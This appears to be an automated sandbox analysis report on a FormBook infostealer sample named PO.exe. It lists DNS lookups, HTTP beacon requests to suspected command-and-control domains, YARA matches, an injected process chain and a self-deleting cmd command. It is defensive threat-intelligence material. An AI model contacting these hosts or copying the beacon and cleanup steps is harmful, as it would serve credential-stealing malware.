Apr 12, 2021 14:44:12.318901062 CEST	8.8.8.8	192.168.2.4	0xb138	No error (0)	www.adanahabernet.com		172.120.90.239	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:17.845458031 CEST	8.8.8.8	192.168.2.4	0x2340	Name error (3)	www.swpszx.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:22.946855068 CEST	8.8.8.8	192.168.2.4	0x617e	No error (0)	www.sidepiecebags.com	www10.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 14:44:22.946855068 CEST	8.8.8.8	192.168.2.4	0x617e	No error (0)	www10.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 14:44:22.946855068 CEST	8.8.8.8	192.168.2.4	0x617e	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 14:44:22.946855068 CEST	8.8.8.8	192.168.2.4	0x617e	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 14:44:22.946855068 CEST	8.8.8.8	192.168.2.4	0x617e	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:28.536580086 CEST	8.8.8.8	192.168.2.4	0x376e	No error (0)	www.mitraberdaya.com	mitraberdaya.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 14:44:28.536580086 CEST	8.8.8.8	192.168.2.4	0x376e	No error (0)	mitraberdaya.com		5.181.216.112	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:34.368071079 CEST	8.8.8.8	192.168.2.4	0x6ec8	Name error (3)	www.oaisdjoqwekxc.info	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.marienish.com

www.wwwflixxy.com

www.adanahabernet.com

www.sidepiecebags.com

www.mitraberdaya.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49757	88.198.220.232	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 14:44:01.792294979 CEST	6356	OUT	GET /sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ HTTP/1.1 Host: www.marienish.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 14:44:01.859483957 CEST	6356	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 12 Apr 2021 12:44:01 GMT Server: Apache Location: https://www.marienish.com/sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ Content-Length: 393 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 72 69 65 6e 69 73 68 2e 63 6f 6d 2f 73 61 77 63 2f 3f 6c 66 3d 43 5a 36 58 26 61 6d 70 3b 6e 4e 36 30 6d 3d 59 74 33 32 7a 35 33 30 65 32 74 49 54 63 4f 45 57 35 53 56 48 62 35 79 72 49 45 4c 6f 6a 44 67 37 2b 46 67 49 35 2f 5a 54 4b 37 36 47 75 6f 50 4c 67 59 75 56 6d 64 38 72 4c 65 61 70 62 4f 71 65 58 52 51 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 72 69 65 6e 69 73 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.marienish.com/sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ">here</a>.</p><hr><address>Apache Server at www.marienish.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49759	81.17.18.197	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 14:44:07.017080069 CEST	6368	OUT	GET /sawc/?nN60m=oHoe0+b7kBAmda/0Hio/bDRlPufoMqcyuQMuAHeH1TSMS98bQSjEeWPHvQ043L9SYNbL&lf=CZ6X HTTP/1.1 Host: www.wwwflixxy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 14:44:07.083889961 CEST	6369	IN	HTTP/1.1 200 OK cache-control: max-age=0, private, must-revalidate connection: close content-length: 565 content-type: text/html; charset=utf-8 date: Mon, 12 Apr 2021 12:44:06 GMT server: nginx set-cookie: sid=c52b47e4-9b8c-11eb-89fd-2dd5e54b280f; path=/; domain=.wwwflixxy.com; expires=Sat, 30 Apr 2089 15:58:14 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 77 77 66 6c 69 78 78 79 2e 63 6f 6d 2f 73 61 77 63 2f 3f 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 78 4f 44 49 7a 4f 44 59 30 4e 79 77 69 61 57 46 30 49 6a 6f 78 4e 6a 45 34 4d 6a 4d 78 4e 44 51 33 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 48 46 6f 63 48 4a 69 4e 7a 4a 78 64 6a 42 77 5a 33 59 33 5a 6e 4d 78 4f 57 46 6c 4e 6d 59 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 54 67 79 4d 7a 45 30 4e 44 63 73 49 6e 52 7a 49 6a 6f 78 4e 6a 45 34 4d 6a 4d 78 4e 44 51 33 4d 44 63 78 4f 44 51 30 66 51 2e 64 6c 72 51 6a 76 73 67 79 66 5a 38 30 42 6f 7a 73 51 43 72 6a 2d 53 77 47 4f 39 71 6c 6a 5f 58 55 54 6c 4e 34 34 52 41 35 4b 34 26 6c 66 3d 43 5a 36 58 26 6e 4e 36 30 6d 3d 6f 48 6f 65 30 2b 62 37 6b 42 41 6d 64 61 25 32 46 30 48 69 6f 25 32 46 62 44 52 6c 50 75 66 6f 4d 71 63 79 75 51 4d 75 41 48 65 48 31 54 53 4d 53 39 38 62 51 53 6a 45 65 57 50 48 76 51 30 34 33 4c 39 53 59 4e 62 4c 26 73 69 64 3d 63 35 32 62 34 37 65 34 2d 39 62 38 63 2d 31 31 65 62 2d 38 39 66 64 2d 32 64 64 35 65 35 34 62 32 38 30 66 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.wwwflixxy.com/sawc/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxODIzODY0NywiaWF0IjoxNjE4MjMxNDQ3LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycHFocHJiNzJxdjBwZ3Y3ZnMxOWFlNmYiLCJuYmYiOjE2MTgyMzE0NDcsInRzIjoxNjE4MjMxNDQ3MDcxODQ0fQ.dlrQjvsgyfZ80BozsQCrj-SwGO9qlj_XUTlN44RA5K4&lf=CZ6X&nN60m=oHoe0+b7kBAmda%2F0Hio%2FbDRlPufoMqcyuQMuAHeH1TSMS98bQSjEeWPHvQ043L9SYNbL&sid=c52b47e4-9b8c-11eb-89fd-2dd5e54b280f');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49763	172.120.90.239	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 14:44:12.523111105 CEST	6408	OUT	GET /sawc/?lf=CZ6X&nN60m=LtE+xZw49qZxNGHwe/5duJoxTMG7p0RZVZ9/xidjWtVQjRXR0IRVZ3163NMz7MOSj/bw HTTP/1.1 Host: www.adanahabernet.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 14:44:12.727207899 CEST	6409	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Mon, 12 Apr 2021 12:44:11 GMT Connection: close Data Raw: 33 0d 0a ef bb bf 0d 0a Data Ascii: 3
Apr 12, 2021 14:44:12.727238894 CEST	6410	IN	Data Raw: 31 30 32 36 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 20 63 6f 6e 74 65 6e 74 3d 6e 6f 2d Data Ascii: 1026<html><head><meta charset=UTF-8 /><meta http-equiv=Cache-Control content=no-siteapp /><meta http-equiv=Cache-Control content=no-transform /><meta name=applicable-device content=pc,mobile /><meta name=viewport content="width=device-width,
Apr 12, 2021 14:44:12.727257013 CEST	6411	IN	Data Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 35 36 35 36 7d 2e 61 6c 65 72 74 2d 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 34 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 Data Ascii: ound-color:#ff5656}.alert-footer{margin:0 auto;height:42px;text-align:center;width:100%;margin-bottom:10px}.alert-footer-icon{float:left}.alert-footer-text{float:left;border-left:2px solid #eee;padding:3px 0 0 5px;height:40px;color:#0b85cc;fon
Apr 12, 2021 14:44:12.727279902 CEST	6413	IN	Data Raw: 44 6f 53 78 78 77 37 42 77 77 35 72 43 6a 67 30 3d 27 2c 27 77 72 73 59 77 72 44 44 71 73 4b 4c 50 73 4b 6b 77 37 58 44 69 4d 4f 48 77 6f 49 6a 27 2c 27 77 37 63 39 77 70 2f 43 76 47 50 44 6a 63 4f 78 41 38 4b 54 77 72 6b 79 27 2c 27 4c 73 4f 32 Data Ascii: DoSxxw7Bww5rCjg0=','wrsYwrDDqsKLPsKkw7XDiMOHwoIj','w7c9wp/CvGPDjcOxA8KTwrky','LsO2w5PDj8OCw7rDgsKAwqg=','BU18LsOW','VVvDgwvDgA==','w73DpsO0Ah4=','wphqT2nDsQ==','SynDuQzDlw==','woDChsOCFDA=','S3rDuCTDqA==','wq8YwrDDrsKTL8K7w7nDhMOGwrQ/FsOM','FG
Apr 12, 2021 14:44:12.727292061 CEST	6413	IN	Data Raw: 55 77 71 67 69 49 51 3d 3d 27 2c 27 58 38 4b 43 4d 63 4f 44 77 6f 59 32 77 36 30 3d 27 2c 27 62 63 4f 34 77 6f 7a 44 68 38 4b 66 77 37 4c 43 6a 38 4b 4d 77 37 77 3d 27 2c 27 77 36 49 31 56 54 76 43 75 77 3d 3d 27 2c 27 77 72 50 44 68 4d 4b 30 77 Data Ascii: UwqgiIQ==','X8KCMcODwoY2w60=','bcO4wozDh8Kfw7LCj8KMw7w=','w6I1VTvCuw==','wrPDhMK0wrALYw==','UsOrBljCkA==','w54gwoVLTA==','wrbD

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49764	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 14:44:23.013834000 CEST	6415	OUT	GET /sawc/?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN3GO43/2+iRXsYUADi HTTP/1.1 Host: www.sidepiecebags.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 14:44:23.112587929 CEST	6416	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 12 Apr 2021 12:44:23 GMT Content-Length: 0 Connection: close location: https://www.sidepiecebags.com/sawc?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN3GO43%2F2+iRXsYUADi strict-transport-security: max-age=120 x-wix-request-id: 1618231463.06595580458311231 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjiVMoGgJZPyIJpdYBUTBrV,qquldgcFrj2n046g4RNSVO38E53VHF73OUfaaLx5QS1YgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalkmuQylsJA3V7E3glv1YWYkVHNk5u2d09JBfuIudoiNFGgqFbFMYwiXnFojPwdof6Is93w6LXo3u2avFp3+sQqQ=,2UNV7KOq4oGjA5+PKsX47HMD3XjoxaKbTYcffYmebS0=,sqmudy1rWy5CXemzdhzS/DvShABuJSyPlI0TjoOmnGJNG+KuK+VIZfbNzHJu0vJu,WHOG0+z0OllpcvLoF6CtMKCiVg5TzCetmiVmxYEc1wjcxUjJ8rpSPv59B752oTh6hyBvImev6xi3GuPfdt7N/g== Cache-Control: no-cache Server: Pepyaka/1.19.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49765	5.181.216.112	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 14:44:28.738830090 CEST	6417	OUT	GET /sawc/?nN60m=ZLBYf+dvKraj5xhFECL+Ta+rlTPSnPltnvpHOwD/x7pMqcIuVlTqLuPQwCL73z9ijdq8&lf=CZ6X HTTP/1.1 Host: www.mitraberdaya.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 14:44:29.873827934 CEST	6417	IN	HTTP/1.1 301 Moved Permanently Connection: close X-Powered-By: PHP/7.4.16 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.mitraberdaya.com/sawc/?nN60m=ZLBYf+dvKraj5xhFECL+Ta+rlTPSnPltnvpHOwD/x7pMqcIuVlTqLuPQwCL73z9ijdq8&lf=CZ6X Content-Length: 0 Date: Mon, 12 Apr 2021 12:44:29 GMT Server: LiteSpeed Vary: User-Agent

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO.exe PID: 6856 Parent PID: 5872

General

Start time:	14:42:24
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\PO.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PO.exe'
Imagebase:	0x590000
File size:	542208 bytes
MD5 hash:	4BB710142C4FA183E24DBD3CE3C7B51D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: AddInProcess32.exe PID: 7140 Parent PID: 6856

General

Start time:	14:43:07
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase:	0xff0000
File size:	42080 bytes
MD5 hash:	F2A47587431C466535F3C3D3427724BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 7140

General

Start time:	14:43:13
Start date:	12/04/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wlanext.exe PID: 6984 Parent PID: 3424

General

Start time:	14:43:29
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wlanext.exe
Imagebase:	0x2a0000
File size:	78848 bytes
MD5 hash:	CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4488 Parent PID: 6984

General

Start time:	14:43:34
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7080 Parent PID: 4488

General

Start time:	14:43:35
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PO.exe PID: 6856 Parent PID: 5872 PO.exeCOMMON

Executed Functions

Function 05AC25B0, Relevance: 1.8, APIs: 1, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c668afc4129dd7f344fada36d675763460b75455b3b6fb01a48eecfda8816cb
Instruction ID: 6a60299d341d0d9ccf51823dfacbadad4b637a618c0d6598e0f3d1c1ea84d892
Opcode Fuzzy Hash: 4c668afc4129dd7f344fada36d675763460b75455b3b6fb01a48eecfda8816cb
Instruction Fuzzy Hash: BAA17D39E04104DBDB14DBA8D485FADBBB3FF88340F1584A9E596AB395CB349C42CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0280FBF8, Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0280FDE4

Memory Dump Source

Source File: 00000000.00000002.753142252.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: dcfeccaf6a7d872d8040e751d81b26840bf55cbd0f2cb2d3d805d551b9e4698c
Instruction ID: 6fed378119adcde0cba3b42301b8b20a2616eb9b1138610774da55a5be4a4a6d
Opcode Fuzzy Hash: dcfeccaf6a7d872d8040e751d81b26840bf55cbd0f2cb2d3d805d551b9e4698c
Instruction Fuzzy Hash: F691D175D0022D9FCB25CFA4C880BDDBBB1AF59304F0490AAE549B7650DB70AA85CF84

Uniqueness

Uniqueness Score: -1.00%

Function 05AC7B98, Relevance: 1.7, Strings: 1, Instructions: 473COMMON

Download Yara Rule

Strings

#wRg^, xrefs: 05AC82A4, 05AC82A9

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID: #wRg^
API String ID: 0-4133839354
Opcode ID: 3e121224c9a0f960eacb89a639214f812cd18bdd43a6fac515c0e75b1856f9b4
Instruction ID: b29fb874b9464a6a15c8710649aae51c5200971419e1de17b2ea86e76bee587a
Opcode Fuzzy Hash: 3e121224c9a0f960eacb89a639214f812cd18bdd43a6fac515c0e75b1856f9b4
Instruction Fuzzy Hash: AF32D374905228CFDB69DF64D845BEDBBB2FB49301F5084E9E40AA7394DB359A82CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05ACCC85, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

, xrefs: 05ACCC89

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1b5a18cf5aea9dd3f3d86dade7e1ae0e065765267dc458249dcee361c2b48960
Instruction ID: b0159eca19d44a3149757d084d3f29d0bde7c49140650b9c7248f71f81ad19ea
Opcode Fuzzy Hash: 1b5a18cf5aea9dd3f3d86dade7e1ae0e065765267dc458249dcee361c2b48960
Instruction Fuzzy Hash: AD41CAB4D042489FDB10CFA9C585BDEFFF0AB09314F20916AE428BB290DB749945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05AC0040, Relevance: .9, Instructions: 896COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb8464e88fd1dd1cd425da77fccbc61f35b46a349222600ed2f7c84f8056d1ac
Instruction ID: 8d3a0e4ef6fa099aa545622d5897db1dfb7f6ba9001da8e94c04e737b754ad11
Opcode Fuzzy Hash: bb8464e88fd1dd1cd425da77fccbc61f35b46a349222600ed2f7c84f8056d1ac
Instruction Fuzzy Hash: 27723C70A00219DFDB14DF65C988AAEBBF2FF88304F1584A9E516EB365DB34D942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05AC6018, Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca53060635ab15a7ff97d308c01d128859e1954ff5c608e920e2bb22b037fb0
Instruction ID: 4b305574d1bb1abf98ed0affb58173978a201b059caad0ccee32dd1b77ab256e
Opcode Fuzzy Hash: 9ca53060635ab15a7ff97d308c01d128859e1954ff5c608e920e2bb22b037fb0
Instruction Fuzzy Hash: 9C22C175A00228DFDB65CFA8C944F99BBB2FF48304F1580E9E509AB366DB319991DF10

Uniqueness

Uniqueness Score: -1.00%

Function 05ACDA68, Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c41a160782ff4c43db957f31e92fc49efb2d21ebf778560e0879dd2ff0ad18
Instruction ID: 6cfb35c3bf8db1c581761b5d2efe9432b52e2940e20f00df8ca26e8d3895ef4b
Opcode Fuzzy Hash: d2c41a160782ff4c43db957f31e92fc49efb2d21ebf778560e0879dd2ff0ad18
Instruction Fuzzy Hash: CCB14B70E00208DFCB14DFA9C444A9EBBF2FF89304F14856EE519AB365DB71A985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05ACC968, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b335202ff48ce482e258f3458c1965749d4d776a91769237d13095860edf686
Instruction ID: 0a9ce2fa5ecb2f6901de56f8bf9f630ecb40970f656ba1fd2893f1ca6b6af1b7
